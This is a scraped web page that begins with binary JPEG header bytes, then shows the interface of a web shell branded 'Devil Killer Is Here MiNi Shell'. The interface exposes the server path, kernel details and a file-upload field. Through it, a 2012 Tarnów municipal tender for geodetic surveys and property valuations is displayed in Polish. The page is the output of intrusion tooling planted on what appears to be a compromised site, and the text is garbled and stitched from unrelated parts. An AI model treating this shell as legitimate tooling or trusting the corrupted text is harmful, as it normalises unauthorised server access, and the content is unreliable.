JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121116/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121116/455562-N-2012.html

<p class="kh_header"><b>Tarnów: Wykonanie prac geodezyjnych i operatów szacunkowych określających wartość nieruchomości położonych przy ul. Kąpielowej 4b oraz przy ul. Cmentarnej</b><br>
<b>Numer ogłoszenia: 455562 - 2012; data zamieszczenia: 16.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Tarnowa - Urząd Miasta Tarnowa - Wydział Geodezji i Nieruchomości , ul. Nowa 3, 33-100 Tarnów, woj. małopolskie, tel. 014 6882762, faks 014 6882771.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tarnow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie prac geodezyjnych i operatów szacunkowych określających wartość nieruchomości położonych przy ul. Kąpielowej 4b oraz przy ul. Cmentarnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie polega na wykonaniu prac geodezyjnych oraz operatów szacunkowych określających wartość nieruchomości położonych przy ul. Kąpielowej 4b oraz przy ul. Cmentarnej w Tarnowie. Szczegółowe prace polegają na:
W przypadku nieruchomości przy ul. Kąpielowej 4b:
1.3.1.   Wznowieniu znaków granicznych:
- dz. nr 33/39 obr. 314 o pow. 8045 m2 obj. TR1T/00078703/1 - 15 znaków granicznych
- dz. nr 33/45 obr. 314 o pow. 5879 m2 obj. TR1T/00078703/1 - 8 znaków granicznych
oraz,
1.3.2.    Wykonaniu jednego operatu szacunkowego określającego wartość rynkową nieruchomości stanowiących własność Gminy Miasta Tarnowa ozn. jako dz. nr 33/39 obr. 314 o pow. 8045 m2 obj. TR1T/00078703/1 i dz. nr 33/45 obr. 314 o pow. 5879 m2 obj. TR1T/00078703/1. Ponadto wycenie podlegają:
-	budynek socjalno - administracyjny usytuowany na dz. nr 33/39 obr. 314 położony przy wjeździe od ul. Kąpielowej, dwukondygnacyjny, niepodpiwniczony o pow. zabudowy 236 m2, pow. użytkowej 369 m2, kubaturze 1755 m3;
-	wiata zadaszona usytuowana na dz. nr 33/39 obr. 314 o konstrukcji stalowej, pokrytej blachą falistą, ocynkowaną,
-	budynek warsztatowy, parterowy o konstrukcji żelbetonowej z dachem płaskim, pokrytym blachą, o pow. zabudowy 207,97 m2, pow. użytkowej 176,78 m2, kubaturze 795,51 m3,
-	magazyn kryzysowy usytuowany na dz. nr 33/39 obr. 314 o konstrukcji murowanej i stolarce drewnianej,
-	wiata stalowa I usytuowana na dz. nr 33/39 obr. 314 o konstrukcji żelbetonowej z elementów prefabrykowanych w oparciu o konstrukcję stalową, dach pokryty blachą falistą,
-	wiata stalowa II usytuowana na dz. nr 33/39 obr. 314 o konstrukcji stalowej, ołacenie blacha cynk, dach kryty blachą falistą,
-	budynek magazynowo-gospodarczy - usytuowany na dz. nr 33/39 obr. 314 o konstrukcji murowanej, dach pokryty papą,
-	ogrodzenie siatkowe o pow. ok. 450 mb
W przypadku nieruchomości przy ul. Cmentarnej:
1.3.3.   Wykonaniu projektu podziału geodezyjnego następujących działek:
-	obr. 72 dz. nr 42 dzieli się na działki A i B obj. TR1T/00062062/0
-	obr. 72 dz. nr 55 dzieli się na działki D, E, F obj. TR1T/00062062/0
-	obr. 72 dz. nr 56/2 dzieli się na działki G, H, I obj. TR1T/00036644/3
-	obr. 72 dz. nr 67 dzieli się na działki J, K, L obj. TR1T/00013608/2
-	obr. 72 dz. nr 68/2 dzieli się na działki M, N, O obj. TR1T/00049362/6
zgodnie z pozytywnie zaopiniowanym wstępnym projektem podziału SO-OB.-II.6724.48.2012 
z dnia 23.10.2012 r.
-	obr. 74 dz. nr 22/8 dzieli się na działki A, B obj. TR1T/0009194/5
-	obr. 74 dz. nr 22/12 dzieli się na działki C, D obj. TR1T/00036764/0
-	obr. 74 dz. 251/2 dzieli się na działki E, F, G obj. TR1T/00076078/6
-	obr. 74 dz. 69/5 dzieli się na działki H, I obj. TR1T/00036764/0
-	obr. 74 dz. 98/2 dzieli się na działki J, K obj. TR1T/0032468/7
-	obr. 74 dz. 99/13 dzieli się na działki L, M obj. TR1T/00036764/0
zgodnie z pozytywnie zaopiniowanym wstępnym projektem podziału SO-OB.-II.6724.47.2012 
z dnia 23.10.2012 r.
Za prawidłowe wykonanie zamówienia uważa się przyjęcie operatu do Grodzkiego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej w Tarnowie potwierdzone podpisaniem protokołu odbioru robót,
oraz
1.3.4.Wykonaniu jednego operatu szacunkowego określającego wartość rynkową nieruchomości gruntowych, budynków i budowli przeznaczonych do przekazania w formie aportu dla Przedsiębiorstwa Usług Komunalnych S-ka z o.o. Wycenie podlegają:
-	obr. 72 dz. nr 42/B obj. TR1T/00062062/0
-	obr. 72 dz. nr 55/E obj. TR1T/00062062/0
-	obr. 72 dz. nr 56/H obj. TR1T/00036644/3
-	obr. 72 dz. nr 67/K obj. TR1T/00013608/2
-	obr. 72 dz. nr 68/N obj. TR1T/00049362/6
-	obr. 74 dz. nr 22/B obj. TR1T/0009194/5
-	obr. 74 dz. nr 22/D obj. TR1T/00036764/0
-	obr. 74 dz. nr 251/E obj. TR1T/00076078/6
-	obr. 74 dz. nr 69/I obj. TR1T/00036764/0
-	obr. 74 dz. nr 98/K obj. TR1T/00032468/7
-	obr. 74 dz. nr 99/L obj. TR1T/00036764/0
-	obr. 74 dz. nr 56/12 o pow. 461 m2 obj. TR1T/00036764/0
-	obr. 74 dz. nr 51/21 o pow. 52 m2 obj. TR1T/00036764/0
-	obr. 74 dz. nr 57/3 o pow. 1140 m2 obj. TR1T/00036946/0
-	obr. 74 dz. nr 68/4 o pow. 465 m2 obj. TR1T/00036946/0
-	obr. 74 dz. nr 67/1 o pow. 772 m2 obj. TR1T/00036764/0
-	obr. 74 dz. nr 69/7 o pow. 467 m2 obj. TR1T/00036764/0
-	obr. 74 dz. nr 251/1 o pow. 3697 m2 obj. TR1T/00076078/6
-	budynek administracyjny jednokondygnacyjny wraz z dobudówką usytuowany na dz. nr 251/1 obr. 74 o pow. zabudowy 268 m2, kubaturze 1264 m3,
-	kanalizacja wysypiska łącznie z przepompowniami,
-	ogrodzenie wokół wysypiska ok. 376 mb (ogrodzenie siatkowe na słupkach metalowych),
-	ogrodzenie wokół Azylu dla Psów i Kotów o pow. około 170 mb,
-	boksy dla psów i kotów,
-	kontener stalowy z wybiegiem dla kotów, 
-	oświetlenie,
-	basen przeciwpożarowy,
-	plac składowy - kompostownia,
-	sieć wodociągowa,
-	rów opaskowy,
-	rów melioracyjny,
-	V sektor składowiska (czynny),
-	myjka samochodowa,
-	plac na gospodarowanie odpadami,
-	waga,
-	drogi wewnętrzne, drogi wokół sektorów oraz placów i urządzeń infrastrukturalnych,
-	wiata na sprzęt usytuowana na dz. nr 67/K i 68/N obr. 72 o konstrukcji stalowej, szkieletowej 
z lekką obudową płyt warstwowych,
-	azyl dla psów usytuowany na dz. nr 251/1 obr. 74 o pow. użytkowej 49,02m2, kubaturze 139m3, jednokondygnacyjny,
-	budynek magazynowy usytuowany na dz. nr 251/2  obr. 74 o konstrukcji stalowej,
-	wiata stalowa kompostowni usytuowanej na dz. nr 251/2 obr. 74, o konstrukcji stalowej, ściany zewnętrzne blacha trapezowa, ocynkowana. Segment od strony zachodniej otwarty, 
         a także
1.3.5.Wykonaniu jednego operatu szacunkowego określającego wartość rynkową nieruchomości gruntowych przeznaczonych (po likwidacji Zakładu Składowania Odpadów Komunalnych) do przekazania dla Tarnowskiego Organizatora Komunalnego przy ul. Cmentarnej. Wycenie podlegają:
-	działki powstałe z podziału dz. nr 251/2 obr. 74 obj. TR1T/00076078/6 tj. dz. nr 251/E i dz. nr 251/G obr. 74,
-	działka powstała z podziału dz. nr 42 obr. 72 obj. TR1T/00062062/0 tj. dz. nr 42/A obr. 72,
-	działki powstałe z podziału dz. nr 55 obr. 72 obj. TR1T/00062062/0 tj. dz. nr 55/D i 55/F obr. 72,
-	działki powstałe z podziału dz. nr 56/2 obr. 72 obj. TR1T/00036644/3 tj. dz. nr 56/G i 56/I obr. 72
-	działki powstałe z podziału dz. nr 67 obr. 72 obj. TR1T/00013608/2 tj. dz. nr 67/J i 67/L obr. 72
-	działki powstałe z podziału dz. nr 68/2 obr. 72 obj. TR1T/00049362/6 tj. dz. nr 68/M i 68/O obr 72
-	część działki nr 1/1 obr. 72 o pow. ok. 11602 m2 obj. TR1T/00013608/2
-	część działki nr 7 obr. 72 o pow. ok. 5277 m2 obj. TR1T/00062062/0
-	dz. nr 5 obr. 72 o pow. 4230 m2 obj. TR1T/00076462/5
-	część działki nr 4 obr. 72 o pow. 2986 m2 obj. TR1T/00032437/1
-	część działki nr 6 obr. 72 o pow. ok. 5277 m2 obj. TR1T/00036644/3
-	część działki nr 9 obr. 72 o pow. ok. 179 m2 obj. TR1T/00013608/2
-	dz. nr 10 obr. 72 o pow. 1555 m2 obj. TR1T/00082565/2
-	dz. nr 11 obr. 72 o pow. 1660 m2 obj. TR1T/00036644/3
-	dz. nr 12 obr. 72 o pow. 1670 m2 obj. TR1T/00082722/1
-	dz. nr 13 obr. 72 o pow. 1747 m2 obj. TR1T/00013608/2
-	część działki nr 14 obr. 72 o pow. ok. 1452 m2 obj. TR1T/00082565/2
-	część działki nr 16 obr. 72 o pow. ok. 4006 m2 obj. TR1T/00082722/1
-	część działki nr 17 obr. 72 o pow. ok. 1861m2, obj. TR1T/00062062/0
-	część działki nr 21 obr. 72 o pow. około 2086m2, obj. TR1T/00062062/0
-	dz. nr 22 obr. 72 o pow.2167 m2, obj. TR1T/00049997/6
-	dz. nr 23 obr. 72 o pow.2242 m2, obj. TR1T/00013111/1
-	dz. nr 24 obr. 72 o pow.4001 m2, obj. TR1T/00062062/0
-	dz. nr 25 obr. 72 o pow.2606 m2, obj. TR1T/00013111/1
-	część dz. nr 26 obr. 72 o pow. około 1506m2, obj. TR1T/00049997/6
-	część dz. nr 31 obr. 72 o pow. około 648m2, obj. TR1T/00019889/7
-	dz. nr 30 obr. 72 o pow.1539 m2, obj. TR1T/00013608/2                                                                                                                      
-	część dz. nr 29 obr. 72 o pow. około 2087 m2, obj.TR1T/00013111/1
-	część dz. nr 33 obr. 72 o pow. około 1273 m2, obj. TR1T/00062062/0
-	część dz. nr 34 obr. 72 o pow. około 3088 m2,obj. TR1T/00013608/2
-	część dz. nr 36 obr. 72 o pow. około 868 m2, obj. TR1T/00013608/2
-	część dz. nr 35 obr. 72 o pow. około 87178 m2, obj. TR1T/00015227/1                                                                                           -	część dz. nr 38 obr. 72 o pow. około 1991m2, obj. TR1T/00082722/1
-	dz. nr 39 obr. 72 o pow.4469 m2, obj. TR1T/00062062/0
-	część dz. nr 40 obr. 72 o pow. około 3667 m2, obj. TR1T/00082722/1                                                                                           -	część dz. nr 44 obr. 72 o pow. około 2384 m2, obj. TR1T/00062062/0
-	dz. nr 44 obr. 72 o pow.3168m2, obj. TR1T/00062062/0
-	część dz. nr 41 obr. 72 o pow. około 644 m2, obj. TR1T/00086635/2
-	część dz. nr 50 obr. 72 o pow. około 3224 m2, obj. TR1T/00062062/0
-	dz. nr 51/1 obr. 72 o pow. 2899 m2, obj. TR1T/00053308/1 -  w ? części stanowiąca własność prywatną 
-	dz. nr 51/2 obr. 72 o pow. 61 m2 obj. TR1T/00076751/8
-	dz. nr 52 obr. 72 o pow. 305 m2, obj. TR1T/00013608/2
-	dz. nr 53 obr. 72 o pow. 1352 m2, obj. TR1T/00062062/0
-	dz. nr 54 obr. 72 o pow. 2138 m2, obj. TR1T/00010196/9
-	dz. nr 56/1 obr. 72 o pow. 124 m2, obj. TR1T/00076751/8                                         
-	część dz. nr 57 obr. 72 o pow. około 1202 m2, obj. TR1T/00082722/1
-	część dz. nr 60 obr. 72 o pow. około 1187 m2, obj. TR1T/00010196/9
-	część dz. nr 75 obr. 72 o pow. około 1484 m2, obj. TR1T/00013608/2
-	dz. nr 73/1 obr. 72 o pow.1671m2, obj. TR1T/00062062/0
-	dz. nr 73/2 obr. 72 o pow.477 m2, obj. TR1T/00076751/8
-	dz. nr 71/1 obr. 72 o pow.684 m2, obj. TR1T/00076751/8
-	dz. nr 71/2 obr. 72 o pow.730 m2,obj. TR1T/00081810/8
-	dz. nr 69 obr. 72 o pow.1491 m2, obj. TR1T/00010196/9
-	dz. nr 65 obr. 72 o pow.1957m2,obj. TR1T/00010196/9
-	część dz. nr 63 obr. 72 o pow. około 1431m2, obj. TR1T/00062062/0
-	część dz. nr 76 obr. 72 o pow. około 1241m2, obj. TR1T/00049362/6
-	dz. nr 74 obr. 72 o pow. 770 m2, obj. TR1T/00036644/3
-	dz. nr 72/1 obr. 72 o pow.231m2,obj. TR1T/00013608/2
-	dz. nr 72/3 obr. 72 o pow.477 m2, obj. TR1T/00076751/8
-	dz. nr 70/3 obr. 72 o pow.1456 m2, obj. TR1T/00076751/8
-	dz. nr 70/2 obr. 72 o pow. 38 m2,obj. TR1T/00076751/8
-	dz. nr 68/1 obr. 72 o pow.74 m2, obj. TR1T/00076751/8
-	dz. nr 66 obr. 72 o pow. 1948 m2,  TR1T/00036644/3
-	część dz. nr 64 obr. 72 o pow. około 1093m2, obj. TR1T/00049362/6
-	część dz. nr 81/1 obr. 72 o pow. około 1418 m2, obj. TR1T/00013608/2
-	część dz. nr 81/3 obr. 72 o pow. około 2245 m2, obj. TR1T/00076751/8
-	dz. nr 82/3 obr. 72 o pow.80 m2, obj. TR1T/00076751/8
-	dz. nr 85 obr. 72 o pow.6583 m2, obj. TR1T/00076752/5
-	dz. nr 82/5 obr. 72 o pow.1699 m2,obj. TR1T/00076751/8
-	część dz. nr 82/2 obr. 72 o pow. około 7695 m2, obj. TR1T/00013608/2
-	dz. nr 14/2 obr. 74 o pow. 94, obj. TR1T/00036764/0
-	część dz. nr 15/2 obr. 74 o pow. około 4607 m2, obj. TR1T/00062062/0
-	dz. nr 15/3 obr. 74 o pow.849 m2,obj. TR1T/00036746/0
-	dz. nr 18/6 obr. 74 o pow.1147 m2,obj. TR1T/00075447/7
-	dz. nr 18/4 obr. 74 o pow. 979 m2, obj. TR1T/00035703/8
-	dz. nr 18/3 obr. 74 o pow.77 m2, obj. TR1T/00035703/8
-	część dz. nr 17 obr. 74 o pow. około 1055 m2  obj. TR1T/00035703/8
-	dz. nr 55/6 obr. 74 o pow. 244 m2,obj. TR1T/00036746/0
-	dz. nr 55/3 obr. 74 o pow. 159 m2, obj. TR1T/00036764/0
-	część dz. nr 55/4 obr. 74 o pow. około 935 m2 obj. TR1T/00035703/8
-	dz. nr 54/10 obr. 74 o pow. 459 m2, obj. TR1T/00036764/0
-	dz. nr 54/6 obr.74 o pow. 267 m2, obj. TR1T/00036764/0
-	część dz. nr 54/7 obr. 72 o pow. około 502 m2, obj. TR1T/00062062/0
-	dz. nr 56/10 obr. 74 o pow.406 m2, obj. TR1T/00036746/0
-	dz. nr 56/6 obr. 74 o pow.244m2, obj. TR1T/00036746/0
-	część dz. nr 56/7 obr. 74 o pow. około 181 m2, obj. TR1T/00037337/5
-	dz. nr 58/8 obr. 74 o pow.8 m2, obj. TR1T/00036746/0
-	dz. nr 58/9 obr. 74 o pow.633 m2, obj. TR1T/00036746/0
-	dz. nr 58/5 obr. 74 o pow.339 m2, obj. TR1T/00036746/0
-	część dz. nr 58/6 obr 74 o pow. około 86 m2 obj. TR1T/00035703/8
-	dz. nr 61/6 obr. 74 o pow. 363 m2, obj. TR1T/00036764/0
-	dz. nr 61/3 obr. 74 o pow.260 m2, obj. TR1T/00036764/0
-	część dz. nr 61/4 obr 74 o pow. około 30 m2 obj. TR1T/00036764/0
-	dz. nr 62/6 obr. 74 o pow.149 m2, obj. TR1T/00036746/0
-	część dz. nr 62/3 obr. 74 o pow. około 340 m2 obj. TR1T/00036746/0
-	dz. nr 99/10 obr. 74 o pow. 13 m2, obj. TR1T/00036746/0
-	część dz. nr 99/12 obr. 74 o pow. około 352 m2 obj.  TR1T/00036746/0
-	część dz. nr 100/6 obr. 74 o pow. około 64 m2 obj. TR1T/00036746/0
-	część dz. nr 120/6 obr. 74 o pow. około 2 m2 obj. TR1T/00036746/0
-	dz. nr 15/13 obr. 73 o pow.80 m2, obj. TR1T/00075582/5
-	dz. nr 15/15 obr. 73 o pow. 242m2, obj. TR1T/00075582/5.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 71.31.90.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przed upływem terminu składania ofert Wykonawca zobowiązany jest wnieść wadium w wysokości:
900 zł (słownie: dziewięćset złotych) na zamówienie
w formach określonych w art. 45 ust. 6 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku. Ocena spełnia warunku odbędzie się na podstawie analizy treści oświadczenia - pkt III.4.1.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku. Ocena spełnia warunku odbędzie się na podstawie analizy treści oświadczenia - pkt III.4.1.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku. Ocena spełnia warunku odbędzie się na podstawie analizy treści oświadczenia - pkt III.4.1.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wykazania, że Wykonawca dysponuje lub będzie dysponował:
- minimum jedną osobą z uprawnieniami do wykonywania samodzielnych funkcji w dziedzinie geodezji i kartografii co najmniej w zakresie wynikającym z art. 43 pkt 2 ustawy z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne (Dz. U. z 2010 r., Nr 193 poz. 1287 z późn. zm.),
- minimum jedną osobą z uprawnieniami rzeczoznawcy majątkowego w zakresie szacowania nieruchomości, o których mowa w art. 174 ust. 2 ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (Dz. U. z 2010 r. Nr 102, poz. 651 z późn. zm.) lub  odpowiadającymi im uprawnieniami wydanymi  na podstawie wcześniej obowiązujących przepisów. Wymaga się, aby osoba ta posiadała doświadczenie w zakresie sporządzania operatów szacunkowych - ilość operatów szacunkowych, które osoba wykonała - minimum 5.
Wykonawca może wykazać, iż dysponuje lub będzie dysponował minimum jedną osobą jeśli osoba ta wykaże się wymaganymi uprawnieniami i doświadczeniem.
W przypadku Wykonawców zagranicznych, dopuszcza się równoważne kwalifikacje nabyte w państwach członkowskich Unii Europejskiej , Konfederacji Szwajcarskiej  lub Europejskiego Porozumienia o Wolnym Handlu ( EFTA) - stronach umowy o Europejskim Obszarze Gospodarczym, na zasadach określonych w art. 193 ust. 2 ustawy o gospodarce nieruchomościami z uwzględnieniem postanowień ustawy z dnia 18.03.2008 r. (Dz. U. z 2008 r. Nr 63 poz. 394 ze zm.)  o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.
  Jeżeli Wykonawca w przetargu (niezależnie od charakteru prawnego łączących stosunków z innymi podmiotami) polega na zasobie innego podmiotu - osobie zdolnej do wykonania zamówienia, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tą osobą. W szczególności przedstawiając w tym celu w oryginale pisemne zobowiązanie innego podmiotu do oddania mu do dyspozycji osoby z uprawnieniami jak wskazano wyżej, na okres korzystania z tej osoby przy wykonywaniu zamówienia.
Zamawiający dokona oceny spełniania warunku na podstawie analizy treści oświadczeń i dokumentu - pkt. III.4.1, z zastrzeżeniem pkt. III.6.1.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku. Ocena spełnia warunku odbędzie się na podstawie analizy treści oświadczenia - pkt. III.4.1.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

